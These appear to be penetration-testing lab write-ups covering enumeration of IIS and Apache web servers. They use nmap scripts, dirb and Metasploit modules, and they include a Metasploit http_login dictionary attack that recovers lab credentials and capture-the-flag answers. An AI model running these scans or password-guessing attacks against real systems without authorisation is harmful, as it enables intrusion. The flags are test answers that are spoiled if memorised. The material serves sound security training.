http-enum

GENERATED WORDS: 4612

---- Scanning URL: http://10.4.16.17/ ---- ==> DIRECTORY: http://10.4.16.17/app_themes/ ==> DIRECTORY: http://10.4.16.17/aspnet_client/ ==> DIRECTORY: http://10.4.16.17/configuration/ ==> DIRECTORY: http://10.4.16.17/content/ ==> DIRECTORY: http://10.4.16.17/Content/ ==> DIRECTORY: http://10.4.16.17/downloads/ ==> DIRECTORY: http://10.4.16.17/Downloads/ ==> DIRECTORY: http://10.4.16.17/resources/ ==> DIRECTORY: http://10.4.16.17/Resources/

---- Entering directory: http://10.4.16.17/app_themes/ ---- ==> DIRECTORY: http://10.4.16.17/app_themes/default/ ==> DIRECTORY: http://10.4.16.17/app_themes/Default/

---- Entering directory: http://10.4.16.17/aspnet_client/ ---- ==> DIRECTORY: http://10.4.16.17/aspnet_client/system_web/ [...] ---- Entering directory: http://10.4.16.17/resources/ ---- ==> DIRECTORY: http://10.4.16.17/resources/images/ ==> DIRECTORY: http://10.4.16.17/resources/Images/

---- Entering directory: http://10.4.16.17/Resources/ ---- ==> DIRECTORY: http://10.4.16.17/Resources/images/ ==> DIRECTORY: http://10.4.16.17/Resources/Images/

---- Entering directory: http://10.4.16.17/app_themes/default/ ---- ==> DIRECTORY: http://10.4.16.17/app_themes/default/images/ ==> DIRECTORY: http://10.4.16.17/app_themes/default/Images/

---- Entering directory: http://10.4.16.17/app_themes/Default/ ---- ==> DIRECTORY: http://10.4.16.17/app_themes/Default/images/ ==> DIRECTORY: http://10.4.16.17/app_themes/Default/Images/ [...]

browsh — A fully interactive, real-time, and modern text-based browser rendered to TTYs and browsers. It's used when only command line is available or no browser is installed.

Copy

browsh --startup-url http://10.4.16.17/Default.aspx

Note: The target application is WebGoat.net

Lab 2

🔬 Windows Recon: IIS: Nmap Scripts

Target IP: 10.4.21.207
Enumeration of an IIS HTTP server using nmap scripts

Use the nmap http-enum script to discover and enumerate web server directories.

nmap 10.4.21.207
    PORT     STATE SERVICE
    80/tcp   open  http
    135/tcp  open  msrpc
    139/tcp  open  netbios-ssn
    445/tcp  open  microsoft-ds
    3306/tcp open  mysql
    3389/tcp open  ms-wbt-server

nmap --script=http-enum -sV -p80 10.4.21.207

Output:

80/tcp open  http    Microsoft IIS httpd 10.0
| http-enum:
|   /content/: Potentially interesting folder
|   /downloads/: Potentially interesting folder
|_  /webdav/: Potentially interesting folder
|_http-server-header: Microsoft-IIS/10.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Potentially interesting folders are content, downloads, webdav.

Use the nmap http-headers script to display the HTTP headers:

nmap --script=http-headers -sV -p80 10.4.21.207

Output:

80/tcp open  http    Microsoft IIS httpd 10.0
| http-headers:
|   Cache-Control: private
|   Content-Type: text/html; charset=utf-8
|   Location: /Default.aspx
|   Server: Microsoft-IIS/10.0
|   Set-Cookie: ASP.NET_SessionId=vepmic1tb4hcstgiqdkjj3iy; path=/; HttpOnly; SameSite=Lax
|   X-AspNet-Version: 4.0.30319
|   Set-Cookie: Server=RE9UTkVUR09BVA==; path=/
|   X-XSS-Protection: 0
|   X-Powered-By: ASP.NET
|   Date: Thu, 16 Feb 2023 15:48:53 GMT
|   Connection: close
|   Content-Length: 130
|
|_  (Request type: GET)
|_http-server-header: Microsoft-IIS/10.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Notes:

IIS Server version is 10.0
ASP.NET version is 4.0.30319
XSS Protection is off (0)
Default page of the target web app is /Default.aspx

Use the nmap http-methods script to find supported options/methods:

nmap --script=http-methods --script-args http-methods.url-path=/webdav/ -p80 10.4.21.207

Output:

PORT   STATE SERVICE
80/tcp open  http
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT
|   Potentially risky methods: TRACE COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT
|_  Path tested: /webdav/

Enumerated supported HTTP methods are OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, DELETE, MOVE, PROPPATCH, MKCOL, LOCK, UNLOCK, PUT.

Use the nmap http-webdav-scan script to enumerate WebDAV installation:

nmap --script=http-webdav-scan --script-args http-methods.url-path=/webdav/ -p80 10.4.21.207

Output:

80/tcp open  http
| http-webdav-scan:
|   WebDAV type: Unknown
|   Server Type: Microsoft-IIS/10.0
|   Server Date: Thu, 16 Feb 2023 15:58:39 GMT
|   Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
|_  Allowed Methods: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, LOCK, UNLOCK

Lab 3

🔬 Apache Recon: Dictionary Attack

Target IP: 192.199.232.3
Enumeration of an Apache HTTP server

ip -br -c a
	eth1@if172533   UP   192.199.232.2/24

nmap -sV -sC 192.199.232.3

Output:

80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 02:42:C0:C7:E8:03 (Unknown)

Running web server version is Apache httpd 2.4.18.

curl 192.199.232.3 | more

# or
browsh --startup-url http://192.199.232.3

Note: Apache2 Ubuntu Default page is hosted on the running web server.

Perform directories brute-force using the metasploit auxiliary scanner brute_dirs. Use robots_txt module to detect robots.txt files and analyze its content too.

msfconsole

use auxiliary/scanner/http/brute_dirs
set RHOSTS 192.199.232.3
exploit

Output:

[*] Using code '404' as not found.
[+] Found http://192.199.232.3:80/dir/ 401
[+] Found http://192.199.232.3:80/poc/ 401
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

dir, poc directories found.

use auxiliary/scanner/http/robots_txt
set RHOSTS 192.199.232.3
exploit

Output:

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

# No /robots.txt found

curl — command line tool and library for transferring data with URLs

curl http://192.199.232.3/dir

Output:

<title>401 Unauthorized</title>

curl -I http://192.199.232.3/dir

Output:

HTTP/1.1 401 Unauthorized
Date: Thu, 16 Feb 2023 18:00:56 GMT
Server: Apache/2.4.18 (Ubuntu)
WWW-Authenticate: Basic realm="private"
Content-Type: text/html; charset=iso-8859-1

Note: The /dir directory is using Basic auth protection — see the WWW-Authenticate header.

curl http://192.199.232.3/poc

Output:

<title>301 Moved Permanently</title>

Use the metasploit http_header module to identify the /poc directory protection:

msfconsole

use auxiliary/scanner/http/http_header
set RHOSTS 192.199.232.3
set HTTP_METHOD GET
set TARGETURI /poc/
exploit

Output:

[+] 192.199.232.3:80     : CONTENT-TYPE: text/html; charset=iso-8859-1
[+] 192.199.232.3:80     : SERVER: Apache/2.4.18 (Ubuntu)
[+] 192.199.232.3:80     : WWW-AUTHENTICATE: Digest realm="Private", nonce="92BOH9X0BQA=373907c8c2a4e147272a81df61079fa305e185af", algorithm=MD5, qop="auth"
[+] 192.199.232.3:80     : detected 3 headers
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Note: The /poc directory is using Digest auth protection.

Use the metasploit http_login module to attempt HTTP user authentication.

Create a user file:

echo -e "alice\nbob\n" > /tmp/users
# creates "alice" and "bob"

msfconsole

use auxiliary/scanner/http/http_login
set RHOSTS 192.199.232.3
set USER_FILE /tmp/users
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set VERBOSE false
set AUTH_URI /dir/
exploit

Output:

[*] Attempting to login to http://192.199.232.3:80/dir/
[+] 192.199.232.3:80 - Success: 'bob:qwerty'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The /dir directory credentials are bob:qwerty.

curl -u bob:qwerty http://192.199.232.3/dir/

Reveal Flag — dir directory flag is:

dir directory flag

72af1d9471cfea41ac0ff3600b3702f6

Next, attempt authentication for /poc:

msfconsole

use auxiliary/scanner/http/http_login
set RHOSTS 192.199.232.3
set USER_FILE /tmp/users
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set VERBOSE false
set AUTH_URI /poc/
exploit

Output:

[*] Attempting to login to http://192.199.232.3:80/poc/
[+] 192.199.232.3:80 - Success: 'alice:password1'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The /poc directory credentials are alice:password1.

curl --digest -u alice:password1 http://192.199.232.3/poc/

Reveal Flag — poc directory flag is:

poc directory flag

0b6f98199bae51afc2f60578f923f8af

Lab 4

🔬 Apache Recon: Basics

Target IP: 192.157.222.3
Enumeration of an Apache HTTP server

ip -br -c a
	eth1@if172533   UP   192.157.222.2/24

nmap -sV -sC 192.157.222.3

Output:

80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 3 disallowed entries
|_/cgi-bin/ Disallow: /junk/ /no-badbot-dir/
|_http-title: Apache2 Ubuntu Default Page: It works

Running web server version is Apache httpd 2.4.18.

curl http://192.157.222.3
wget http://192.157.222.3
	cat index.html

lynx — a text web browser

lynx http://192.157.222.3

Directory brute-force with dirb:

dirb http://192.157.222.3 /usr/share/metasploit-framework/data/wordlists/directory.txt

Output snippet:

---- Scanning URL: http://192.157.222.3/ ----
+ http://192.157.222.3//data (CODE:301|SIZE:313)
+ http://192.157.222.3//dir (CODE:301|SIZE:312)

Metasploit modules:

msfconsole -q

setg RHOSTS 192.157.222.3
setg RHOST 192.157.222.3

use auxiliary/scanner/http/http_version
run
	[+] 192.157.222.3:80 Apache/2.4.18 (Ubuntu)

use auxiliary/scanner/http/brute_dirs
run
    [+] Found http://192.157.222.3:80/dir/ 200
    [+] Found http://192.157.222.3:80/src/ 200

curl http://192.157.222.3/robots.txt

Reveal Flag — robots.txt content:

robots.txt content (flag)

BadBot

Last updated 3 hours ago

Previousftp-enum Nextmysql-enum

Last updated 3 months ago